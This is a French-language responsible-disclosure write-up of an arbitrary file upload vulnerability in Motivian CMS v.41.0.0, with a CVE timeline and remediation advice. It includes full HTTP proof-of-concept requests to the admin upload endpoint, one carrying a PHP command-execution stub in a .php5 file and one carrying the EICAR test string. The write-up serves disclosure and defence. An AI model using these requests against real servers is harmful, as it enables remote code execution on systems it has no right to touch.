
Ce dépôt révèle une vulnérabilité de sécurité découverte dans le système de gestion de contenu Motivian v.41.0.0
Ce dépôt révèle une vulnérabilité de sécurité découverte dans Motivian Content Management System v.41.0.0.
Cette vulnérabilité a été signalée au vendeur conformément aux pratiques de divulgation responsable, ainsi qu'à MITRE, qui a attribué un ID CVE provisoire. Les détails sont rendus publics après l'expiration de la période de divulgation de 45 jours.
Content/Gallery/ImagesUne vulnérabilité de téléchargement de fichier dans Motivian Content Management System v.41.0.0 permet à un attaquant distant de télécharger des fichiers arbitraires avec des extensions modifiées (ex. .php, .png, .txt) contenant du code malveillant, via le composant Content/Gallery/Images.
La vulnérabilité peut être exploitée en téléchargeant des fichiers avec diverses extensions. À des fins de démonstration, deux cas de preuve de concept ont été utilisés : l'un impliquant un fichier .php contenant du code malveillant, et l'autre utilisant un fichier .txt avec la chaîne de test EICAR. Les deux fichiers ont été téléchargés via le composant Content/Gallery/Images.
Voici la transcription complète des requêtes et réponses HTTP utilisées pour démontrer le problème :
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 808
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2oYL3KVZBlAQmYAA
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="resFolderId"
-8
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="token"
M53N7SE0QE1Z4MZV4BRV59QW3TSEZ962
------WebKitFormBoundary2oYL3KVZBlAQmYAA
Content-Disposition: form-data; name="uploadResource"; filename="eicar.txt"
Content-Type: text/plain
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
------WebKitFormBoundary2oYL3KVZBlAQmYAA--
POST /portal/admin/cms/browseManageCmsResources!uploadFile.action HTTP/1.1
Host: [REDACTED]
Content-Length: 789
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLdWSMj4ASbAC9uOz
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="resFolderId"
304802
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="allowedExtensions"
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="hidePageComponents"
false
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="struts.token.name"
token
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="token"
77PMJUJH5ZAQTPWRG5TQCLIOR9CUBK0M
------WebKitFormBoundaryLdWSMj4ASbAC9uOz
Content-Disposition: form-data; name="uploadResource"; filename="test.php5"
Content-Type: application/octet-stream
<?php
echo system('id');
?>
------WebKitFormBoundaryLdWSMj4ASbAC9uOz--
HTTP/1.1 200 OK
Connection: close
Date: Thu, 06 Feb 2025 10:26:29 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 16729
Ne pas autoriser les utilisateurs à télécharger des fichiers arbitraires. Mettre en œuvre une validation stricte des fichiers (type MIME et inspection du contenu), randomiser les noms de fichiers et restreindre les répertoires de téléchargement.
| Date | Action |
|---|---|
| 2025-02-06 | Demande d'ID CVE (CNA: MITRE) |
| 2025-04-02 | Attribution de l'ID CVE |
| 2025-04-07 | Vulnérabilités signalées au vendeur |
| 2025-05-31 | Divulgation publique après expiration de la période de divulgation de 45 jours (54 jours au total) |
| 2025-06-04 | Enregistrement officiel et entrée dans la base de données MITRE et le portail NIST/NVD |
Découvert et divulgué de manière responsable par :
Francesco Marcuccio
Consultant en cybersécurité, Testeur d'intrusion
Attribution du découvreur MITRE mentionné comme :
Francesco Marcuccio
Consultant en cybersécurité, Testeur d'intrusion
Liens de référence : MITRE NIST
Cet ID CVE est officiellement en statut PUBLIÉ. Il sera mis à jour avec un score CVSS par NIST, après analyse.